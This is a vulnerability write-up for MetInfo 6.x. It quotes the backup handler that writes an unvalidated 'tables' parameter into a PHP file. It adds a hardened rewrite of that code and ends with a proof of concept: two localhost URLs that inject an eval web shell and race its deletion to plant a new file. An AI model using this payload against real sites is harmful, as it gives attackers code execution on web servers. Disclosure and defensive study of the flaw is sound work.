
MetInfo 6.x backend (admin) getshell

Description: An issue was discovered in MetInfo 6.x. An attacker with access to the administrative backend can use the database backup function to obtain a web shell.

1. Technical Description:

The relevant code is in /app/system/databack/admin/index.class.php, lines 456 to 478:

    // Excerpt of the backup handler; the 'tables' request parameter is used without validation.
    public function dogetsql($table='') {
        global $_M;
        // 'tables' comes straight from the request when no $table argument is given
        if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
        $localurl=$_M['config']['met_weburl'];
        $tablepre=$_M['config']['tablepre'];
        $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
        if($table){
            $tables=$table;
        }else{
            $tables=$this->dotableprearray($tablepre);
        }

        $sizelimit=2048;

        if($fileid==1){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            // the unvalidated value is written to a .php file under /admin/databack/
            $this->docache_write('bakup_tables.php', $tables);
        }elseif(!$tbl){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $allidlist=explode('|',$tablestx);
            for($i=0;$i<count($allidlist)-1;$i++){
                $tables[$i]=$allidlist[$i];
            }
        }

If we post a string value for 'tables', the program calls docache_write, located at lines 334 to 351:

    function docache_write($file, $string, $type = 'array'){
        global $_M;
        // only array input is serialized into PHP source; a plain string is written verbatim
        if(is_array($string))
        {
            $type = strtolower($type);
            if($type == 'array')
            {
                $string = "<?php\n return ".var_export($string,TRUE).";\n?>";
            }
            elseif($type == 'constant')
            {
                $data='';
                foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
                $string = "<?php\n".$data."\n?>";
            }
        }
        // the file lands under the web-accessible admin directory with a .php name
        file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
    }

This creates a file named 'bakup_tables.php' in /admin/databack/ whose content we control. However, at the end of dogetsql the program deletes the temporary file 'bakup_tables.php':

        $this->docache_delete('bakup_tables.php', $tables);

So we have to win a race condition: the file must be requested, and its code executed, before it is deleted.
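A hardened version of the write path described in the two paragraphs above, added here as an example; it is not MetInfo's code. It fixes both halves of the problem: the request value is whitelisted as a list of table names before anything is written (a string such as the PoC payload is rejected outright), and the cache is stored as JSON under a non-executable filename in a directory that is not served by the web server, so the deletion race no longer matters because there is never an executable file to hit. The function names `validate_table_names`, `safe_cache_write`, `safe_cache_read` and the `$cache_dir` location are assumptions, not part of the project.

```php
<?php
// Added example, not MetInfo code. Hardened handling of the 'tables'
// parameter used by the backup feature discussed above.

// Accept only an array of plain table names carrying the configured prefix.
// Returns the cleaned list, or null when the input must be refused.
function validate_table_names($input, $tablepre) {
    if (!is_array($input)) {
        // A bare string (e.g. PHP source) is never a valid table list.
        return null;
    }
    $clean = array();
    foreach ($input as $name) {
        if (!is_string($name) || !preg_match('/^[A-Za-z0-9_]+$/', $name)) {
            return null;
        }
        // Only tables belonging to this installation's prefix are acceptable.
        if (strpos($name, $tablepre) !== 0) {
            return null;
        }
        $clean[] = $name;
    }
    return $clean;
}

// Persist the validated list as data (JSON), never as PHP source, inside
// $cache_dir, which is assumed to sit outside the web root.
function safe_cache_write($cache_dir, $file, array $data) {
    // The cache name is fixed by the caller; refuse anything path-like.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $file)) {
        return false;
    }
    $path = rtrim($cache_dir, '/') . '/' . $file . '.json';
    // Write to a temporary name and rename so readers never see a partial file.
    $tmp = $path . '.' . uniqid('', true);
    if (file_put_contents($tmp, json_encode($data), LOCK_EX) === false) {
        return false;
    }
    return rename($tmp, $path);
}

// Read the list back; the file is parsed as data, not included as code.
function safe_cache_read($cache_dir, $file) {
    if (!preg_match('/^[A-Za-z0-9_]+$/', $file)) {
        return null;
    }
    $path = rtrim($cache_dir, '/') . '/' . $file . '.json';
    if (!is_file($path)) {
        return null;
    }
    $decoded = json_decode(file_get_contents($path), true);
    return is_array($decoded) ? $decoded : null;
}

// Constructed demo input mirroring the two request shapes from the write-up.
$tablepre = 'met_';
$good = array('met_admin_table', 'met_config');   // legitimate array form
$bad  = '<?php eval($_GET[2]);?>';                // the string form used in the PoC

var_dump(validate_table_names($good, $tablepre)); // array of two table names
var_dump(validate_table_names($bad, $tablepre));  // NULL: refused before any write

// Assumed cache location for the demo; in a deployment this would be a
// configured directory that the web server does not serve.
$cache_dir = sys_get_temp_dir() . '/cache_example';
if (!is_dir($cache_dir)) {
    mkdir($cache_dir, 0700, true);
}
$list = validate_table_names($good, $tablepre);
if ($list !== null && safe_cache_write($cache_dir, 'bakup_tables', $list)) {
    var_dump(safe_cache_read($cache_dir, 'bakup_tables') === $list); // bool(true)
}
```

The validation step alone closes the injection, because the only thing that can reach the file is a list of `[A-Za-z0-9_]` names. Moving the cache out of the web root and off the `.php` extension is defence in depth: it also removes the time-of-write to time-of-delete window that the race in this write-up depends on.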

2. PoC

Download the latest version ( https://www.mituo.cn/upload/file/MetInfo6.1.3.zip ), build a test site, and open it in Google Chrome. After the administrator has logged in, we use this URL:

http://127.0.0.1/metinfo6.1.3/admin/index.php?n=databack&c=index&a=dogetsql&anyid=13&lang=cn&tables=<?php eval($_GET[2]);?>&fileid=1

At the same time, to win the race condition, we request:

http://127.0.0.1/metinfo6.1.3/admin/databack/bakup_tables.php?2=file_put_contents('info.php','<?php%20phpinfo();?>');

Then we get a shell at /admin/databack/info.php.